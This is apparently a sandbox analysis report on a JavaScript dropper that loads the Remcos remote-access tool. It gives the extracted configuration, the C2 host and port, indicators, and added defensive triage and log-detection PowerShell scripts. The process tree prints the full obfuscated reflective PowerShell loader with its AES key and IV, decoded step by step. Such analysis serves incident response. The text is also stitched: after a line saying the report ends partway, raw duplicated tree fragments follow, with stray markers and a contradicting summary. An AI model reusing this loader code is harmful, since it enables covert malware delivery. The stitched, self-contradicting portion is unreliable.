Analysis

max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-04-2024 13:43

Static task: static1
Behavioral task: behavioral1
  Sample: 03042024_2143_Install.js
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 03042024_2143_Install.js
  Resource: win10v2004-20231215-en

General

Target: 03042024_2143_Install.js
Size: 678KB
MD5: 550a5d0ef3c596a05e47361981c0fd17
SHA1: ce47883964e4ca68c30f3dfdc5b8cfde416b4dec
SHA256: 5ede5ee989e327b0562583e3f7563d691b5c1a6ade7804d4c871df84633b5845
SHA512: d68416e4abc50a5d8454f17feeda5a975004180283e06455fb8bc65d4a6c7e4ad3e089747e2a460f0ed050c0c0d4ebf3ef34522190a240378ae91dcdc78513c8
SSDEEP: 768:DkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLD:DCCCCCCCCCCCCCCCCCCK
  (the same short chunk sequence repeats through both halves of the hash, so most of the 678 KB is one block of content repeated over and over; the functional part of the script is small)
Malware Config

Extracted: remcos
RemoteHost: bignight.net:3363
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-1XSDBO
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5

install_flag, keylog_flag and screenshot_flag are all false, so the copy_folder/copy_file, keylog_file and screenshot settings are dormant in this build. The indicators that do apply to it are the mutex Rmc-1XSDBO and the C2 endpoint bignight.net:3363; the persistence seen in this run (Startup\putty.lnk, below) comes from the loader, not from Remcos itself.
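The configuration above gives an incident responder a short list of things to check on a suspect host: the single-instance mutex, the C2 host and port, and the loader artifacts the sandbox reported (C:\Users\<user>\putty.cmd, %TEMP%\tempScript.ps1, Startup\putty.lnk). The following triage script is an added example written for this page, not code from the sandbox vendor, from Remcos or from the loader's author. It assumes the would-be Remcos install path is %AppData%\<copy_folder>\<copy_file> (with install_flag=false it should be absent and is checked only to catch a variant that enables it), and it reads the Startup shortcut through the WScript.Shell COM object to expose the persisted command.

```powershell
# Added host-triage example written for this page; it is not code from the
# sandbox report, from Remcos, or from the loader's author. Indicator values
# (mutex, C2 host:port, putty.cmd, tempScript.ps1, Startup\putty.lnk) are the
# ones reported above. ASSUMPTION: the would-be Remcos install path is built as
# %AppData%\<copy_folder>\<copy_file>; this config has install_flag=false, so
# it should be absent and is checked only to catch a variant that enables it.

$Iocs = [ordered]@{
    Mutex      = 'Rmc-1XSDBO'
    C2Host     = 'bignight.net'
    C2Port     = 3363
    Dropper    = Join-Path $env:USERPROFILE 'putty.cmd'
    TempScript = Join-Path $env:TEMP 'tempScript.ps1'
    StartupLnk = Join-Path ([Environment]::GetFolderPath('Startup')) 'putty.lnk'
    RemcosCopy = Join-Path $env:APPDATA 'Remcos\remcos.exe'   # assumed layout, see above
}

function Test-RemcosMutex {
    # Remcos uses this mutex as a single-instance guard, so OpenExisting
    # succeeding means the RAT is live in this session (or machine-wide for Global\).
    param([string]$Name)
    foreach ($candidate in @($Name, "Global\$Name")) {
        try {
            $m = [System.Threading.Mutex]::OpenExisting($candidate)
            $m.Dispose()
            return $candidate
        }
        catch [System.Threading.WaitHandleCannotBeOpenedException] { }
        catch [System.UnauthorizedAccessException] { return "$candidate (exists, access denied)" }
    }
    return $null
}

function Get-ShortcutTarget {
    # Resolves the .lnk dropped in Startup so the persisted command is visible.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    $lnk = (New-Object -ComObject WScript.Shell).CreateShortcut($Path)
    ('{0} {1}' -f $lnk.TargetPath, $lnk.Arguments).Trim()
}

function Get-FileEvidence {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    $f = Get-Item -LiteralPath $Path
    '{0} bytes, sha256={1}, written {2:u}' -f $f.Length, (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash, $f.LastWriteTimeUtc
}

function Get-C2Evidence {
    # The resolver cache catches a beacon that already happened; the TCP table
    # catches a live one and names the owning process.
    param([string]$C2Host, [int]$Port)
    $hits = @()
    Get-DnsClientCache -ErrorAction SilentlyContinue |
        Where-Object { $_.Entry -like "*$C2Host*" } |
        ForEach-Object { $hits += ('dns-cache {0} -> {1}' -f $_.Entry, $_.Data) }
    Get-NetTCPConnection -RemotePort $Port -ErrorAction SilentlyContinue |
        ForEach-Object {
            $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            $hits += ('tcp {0}:{1} {2} pid={3} ({4})' -f $_.RemoteAddress, $_.RemotePort, $_.State, $_.OwningProcess, $p.ProcessName)
        }
    if ($hits.Count) { $hits -join '; ' } else { $null }
}

function Invoke-RemcosTriage {
    $rows = @(
        [pscustomobject]@{ Indicator = 'mutex';   Value = $Iocs.Mutex;      Evidence = (Test-RemcosMutex $Iocs.Mutex) }
        [pscustomobject]@{ Indicator = 'c2';      Value = ('{0}:{1}' -f $Iocs.C2Host, $Iocs.C2Port); Evidence = (Get-C2Evidence $Iocs.C2Host $Iocs.C2Port) }
        [pscustomobject]@{ Indicator = 'startup'; Value = $Iocs.StartupLnk; Evidence = (Get-ShortcutTarget $Iocs.StartupLnk) }
    )
    foreach ($k in 'Dropper', 'TempScript', 'RemcosCopy') {
        $rows += [pscustomobject]@{ Indicator = $k.ToLower(); Value = $Iocs[$k]; Evidence = (Get-FileEvidence $Iocs[$k]) }
    }
    $rows
}

$report = Invoke-RemcosTriage
$report | Format-Table -AutoSize -Wrap
if ($report | Where-Object Evidence) { Write-Warning 'Remcos/loader indicators present on this host' }
```

Run it in the context of the user who opened the .js (the Startup folder and %TEMP% are per-user); the mutex check only sees the session it runs in unless the Global\ variant exists, and a hit on the shortcut or the dropper is evidence of the loader even when Remcos itself is not running.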
Signatures

Blocklisted process makes network request (22 IoCs)
  flow  pid   process
  4     3992  wscript.exe
  10    2824  powershell.exe
  21    5052  powershell.exe
  27    1724  powershell.exe
  28    1888  powershell.exe
  32    4980  powershell.exe
  35    3780  powershell.exe
  36    2104  powershell.exe
  39    2928  powershell.exe
  51    3096  powershell.exe
  52    4880  powershell.exe
  53    5036  powershell.exe
  54    1888  powershell.exe
  60    3908  powershell.exe
  62    1944  powershell.exe
  63    5012  powershell.exe
  67    2452  powershell.exe
  68    2804  powershell.exe
  69    1276  powershell.exe
  70    1088  powershell.exe
  72    3600  powershell.exe
  75    3600  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Key value queried by wscript.exe:
    \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation

Drops startup file (1 IoC)
  File created by powershell.exe:
    C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.lnk

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Script User-Agent (1 IoC)
  Uses a user-agent string associated with a script host/environment.
  HTTP User-Agent header on flow 4 (the wscript.exe flow in the first table):
    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (64 IoCs, all powershell.exe; pid with number of hits)
  2824 (2), 5052 (2), 5100 (2), 1724 (2), 3636 (2), 1112 (2), 3632 (3), 1888 (3), 1572 (3), 4272 (3), 4980 (3), 4836 (3), 4400 (3), 3780 (3), 4064 (3), 1108 (3), 2104 (3), 3900 (3), 2840 (3), 2928 (3), 4092 (3), 2800 (3), 4808 (2), 3096 (2)

Suspicious use of AdjustPrivilegeToken (57 IoCs, every one SeDebugPrivilege in powershell.exe; pids in the order reported, a pid can appear more than once)
  2824, 5052, 5100, 1724, 3636, 1112, 3632, 1888, 1572, 4272, 4980, 4836, 4400, 3780, 4064, 1108, 2104, 3900, 2840, 2928, 4092, 2800, 4808, 3096, 1004, 2096, 4880, 4044, 232, 5036, 2840, 2556, 1888, 1944, 3588, 3908, 4244, 4816, 1944, 2836, 4992, 5012, 3152, 4608, 2452, 4060, 2104, 2804, 5092, 3488, 1276, 2844, 892, 1088, 1944, 3600, 2664

Suspicious use of SetWindowsHookEx (1 IoC)
  pid 3600 powershell.exe

Suspicious use of WriteProcessMemory (64 IoCs; source pid -> target pid, with the number of writes reported for that pair)
  3992 wscript.exe    -> 2824 powershell.exe  (2)
  2824 powershell.exe -> 4864 cmd.exe         (2)
  4864 cmd.exe        -> 2004 cmd.exe         (2)
  2004 cmd.exe        -> 1984 cmd.exe         (2)
  2004 cmd.exe        -> 5100 powershell.exe  (3)
  3992 wscript.exe    -> 5052 powershell.exe  (2)
  5052 powershell.exe -> 5024 cmd.exe         (2)
  5024 cmd.exe        -> 1344 cmd.exe         (2)
  3992 wscript.exe    -> 1724 powershell.exe  (2)
  1344 cmd.exe        -> 4836 cmd.exe         (2)
  1344 cmd.exe        -> 3636 powershell.exe  (3)
  5100 powershell.exe -> 1112 powershell.exe  (3)
  3636 powershell.exe -> 3632 powershell.exe  (3)
  1724 powershell.exe -> 3764 cmd.exe         (2)
  3992 wscript.exe    -> 1888 powershell.exe  (2)
  3764 cmd.exe        -> 2828 cmd.exe         (2)
  2828 cmd.exe        -> 216 cmd.exe          (2)
  2828 cmd.exe        -> 1572 powershell.exe  (3)
  1572 powershell.exe -> 4272 powershell.exe  (3)
  1888 powershell.exe -> 4864 cmd.exe         (2)
  4864 cmd.exe        -> 2292 cmd.exe         (2)
  3992 wscript.exe    -> 4980 powershell.exe  (2)
  2292 cmd.exe        -> 4040 cmd.exe         (2)
  2292 cmd.exe        -> 4836 powershell.exe  (3)
  4836 powershell.exe -> 4400 powershell.exe  (3)
  4980 powershell.exe -> 4716 cmd.exe         (2)
  4716 cmd.exe        -> 1464 cmd.exe         (2)
  3992 wscript.exe    -> 3780 powershell.exe  (2)
  Each chain has the same shape and maps onto the process tree below; the first one is 3992 wscript.exe -> 2824 powershell.exe (tempScript.ps1) -> 4864 cmd.exe (/c putty.cmd) -> 2004 cmd.exe (/K putty.cmd) -> 1984 cmd.exe (the echo side of the pipe) and 5100 powershell.exe (32-bit, reads the pipe) -> 1112 powershell.exe (-w hidden). Pids 4864 (cmd.exe under 2824, later a new cmd.exe under 1888) and 4836 (cmd.exe under 1344, later a powershell.exe under 2292) are reused by the OS for later short-lived processes, so a pid on its own does not identify a process in this run. The 64-entry list ends at the sixth powershell.exe spawned by wscript.exe.
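The signatures above are behavioural, but the loader also leaves a very specific textual fingerprint in PowerShell script block logging: the console title set to a .cmd path and read back through [Console]::Title, strings built with '<text>'.Replace('<junk>', ''), methods called through an indexed array, and the AES, GZipStream and Reflection.Assembly chain. The scoring function below is an added detection example written for this page, not code from the sandbox vendor or from the malware author. It assumes script block logging (event 4104 in Microsoft-Windows-PowerShell/Operational) is enabled on the host being queried; the sample text it scores is constructed from fragments of the command line captured in the process tree, not a logged event.

```powershell
# Added detection example written for this page; it is not from the sandbox
# vendor or the malware author. It scores PowerShell script-block text for the
# traits of the putty.cmd loader in the process tree. ASSUMPTIONS: script block
# logging (event 4104) is enabled on the queried host; the sample text below is
# constructed from the captured command line, not a logged event.

$LoaderTraits = [ordered]@{
    TitleAsPath      = '\$host\.UI\.RawUI\.WindowTitle\s*=\s*''[^'']+\.(cmd|bat)'''
    ConsoleTitleRead = '\[Console\]::Title'
    JunkReplace      = '''[^'']{8,}''\.Replace\(''[A-Za-z]{3,6}'',\s*''''\)'
    IndexedInvoke    = '(::|\.)\(\$\w+\[\d+\]\)'        # [Type]::($arr[n])(...) or $obj.($arr[n])(...)
    AesCbc           = 'Cryptography\.Aes\]::Create\(\)|CipherMode\]::CBC'
    Gzip             = 'GZipStream'
    ReflectiveLoad   = 'Reflection\.Assembly\]::'
}

function Get-LoaderScore {
    # Returns how many of the traits a script block matches and which ones.
    param([string]$ScriptText)
    $hits = foreach ($t in $LoaderTraits.GetEnumerator()) {
        if ($ScriptText -match $t.Value) { $t.Key }
    }
    [pscustomobject]@{ Score = @($hits).Count; Of = $LoaderTraits.Count; Traits = (@($hits) -join ',') }
}

function Find-LoaderScriptBlocks {
    # Event 4104 properties are MessageNumber, MessageTotal, ScriptBlockText,
    # ScriptBlockId, Path; the text is Properties[2], the script path Properties[4].
    param([int]$Threshold = 4, [int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $s = Get-LoaderScore ([string]$_.Properties[2].Value)
            if ($s.Score -ge $Threshold) {
                [pscustomobject]@{
                    Time      = $_.TimeCreated
                    ProcessId = $_.ProcessId
                    Score     = ('{0}/{1}' -f $s.Score, $s.Of)
                    Traits    = $s.Traits
                    Path      = $_.Properties[4].Value
                }
            }
        }
}

# Constructed sample assembled from fragments of the captured loader (two of
# the fourteen $rFXv elements are enough for the regexes) and a benign one-liner.
$loaderSample = @'
$host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'LoahPUvdhPUv'.Replace('hPUv', '');$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null)
'@
$benignSample = 'Get-ChildItem C:\Logs -Recurse | Where-Object Length -gt 1MB | Sort-Object LastWriteTime'

Get-LoaderScore $loaderSample
Get-LoaderScore $benignSample
# On a live host: Find-LoaderScriptBlocks -Threshold 4 | Format-Table -AutoSize
```

A threshold of four keeps single legitimate uses of AES or reflective loading from alerting; the title-as-path and junk-Replace traits are the ones that carry most of the weight, because ordinary administration scripts have no reason to read their own source back through the console title or to assemble method names at run time.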
Processes (tree view; the leading number is the depth the sandbox reported for each process)

1 C:\Windows\system32\wscript.exe
  cmdline: wscript.exe C:\Users\Admin\AppData\Local\Temp\03042024_2143_Install.js
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   (first of seven launches of the same command line shown on this page)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    3 C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
      - Suspicious use of WriteProcessMemory

      4 C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
        - Suspicious use of WriteProcessMemory

        5 C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> "
          cmd /S /D /c" ... " is the form cmd.exe uses to run one side of a pipeline inside a batch file; here it is the left side, an echo of the PowerShell loader. The echoed text is reproduced unchanged below, except that the single line is split at statement boundaries:

            $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';
            $rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');
            powershell -w hidden;
            function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}
            function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}
            $HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);
            $kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));
            $YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));
            [System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);
            [System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null);

          $rFXv resolved (each element is '<name with junk inserted>'.Replace('<junk>', '')):
            [0] EntryPoint     [1] CreateDecryptor    [2] CopyTo      [3] ChangeExtension   [4] GetCurrentProcess
            [5] Invoke         [6] ReadLines          [7] Decompress  [8] ElementAt         [9] Load
            [10] MainModule    [11] FromBase64String  [12] Split      [13] TransformFinalBlock
          With the names filled in, the loader: sets the console title to the batch file's own path; runs `powershell -w hidden` (the depth-6 process below); reads the batch file back through [Console]::Title with File.ReadLines; takes elements 5 and 6 (zero-based, so the sixth and seventh lines of putty.cmd), drops a 2-character prefix from each, Base64-decodes, decrypts with AES-CBC/PKCS7 under the hard-coded 32-byte key 6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q= and 16-byte IV /1orvBajL3CcAQUeEJe3RA==, and gunzips; then Assembly.Load + EntryPoint.Invoke, the line-6 payload first and the line-5 payload second. The key and IV are static, so anyone holding putty.cmd can recover both stages offline. Indices 3, 4, 10 and 12 are never used in this script.

        5 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe   (32-bit PowerShell by explicit path, no arguments; a sibling of the echo process, consistent with `echo ... | powershell.exe` in the batch file)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

          6 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden   (the image is under SysWOW64 although the command line says System32: WoW64 file-system redirection, because the parent is 32-bit)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

  2 powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"   (launches 2, 3 and 4: three subtrees identical to each other, with the same paths and command lines as the first launch, the loader script included)
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    3 cmd.exe /c C:\Users\Admin\putty.cmd
      - Suspicious use of WriteProcessMemory
      4 cmd.exe /K C:\Users\Admin\putty.cmd
        - Suspicious use of WriteProcessMemory
        5 cmd.exe /S /D /c" echo <loader script, identical to the first launch> "
        5 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          6 powershell.exe -w hidden (SysWOW64 image)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

  2 powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"   (launch 5; same command lines as the first launch)
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    3 cmd.exe /c C:\Users\Admin\putty.cmd
      - Suspicious use of WriteProcessMemory
      4 cmd.exe /K C:\Users\Admin\putty.cmd
        5 cmd.exe /S /D /c" echo <loader script, identical to the first launch> "
        5 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          6 powershell.exe -w hidden (SysWOW64 image)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

  2 powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"   (launch 6; same command lines as the first launch)
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    3 cmd.exe /c C:\Users\Admin\putty.cmd
      4 cmd.exe /K C:\Users\Admin\putty.cmd
        5 cmd.exe /S /D /c" echo <loader script, identical to the first launch> "
        5 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          6 powershell.exe -w hidden (SysWOW64 image)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

  2 powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"   (launch 7; same command lines as the first launch)
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    3 cmd.exe /c C:\Users\Admin\putty.cmd
      4 cmd.exe /K C:\Users\Admin\putty.cmd
        5 cmd.exe /S /D /c" echo <loader script, identical to the first launch> "
        (the report as captured ends partway through this subtree's echo command line; the remaining processes of launch 7 and any later launches are not on the page)
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Remaining process-tree entries: the same chain (powershell.exe -ExecutionPolicy Bypass -File tempScript.ps1 → cmd.exe /c putty.cmd → cmd.exe /K putty.cmd → cmd.exe /S /D /c with the obfuscated PowerShell above → powershell.exe → powershell.exe -w hidden) is spawned repeatedly for the rest of the run, each instance with identical command lines and the signatures "Blocklisted process makes network request" and "Suspicious use of AdjustPrivilegeToken".
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
Downloads
-
C:\ProgramData\remcos\logs.dat (144B)
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (3KB)
-
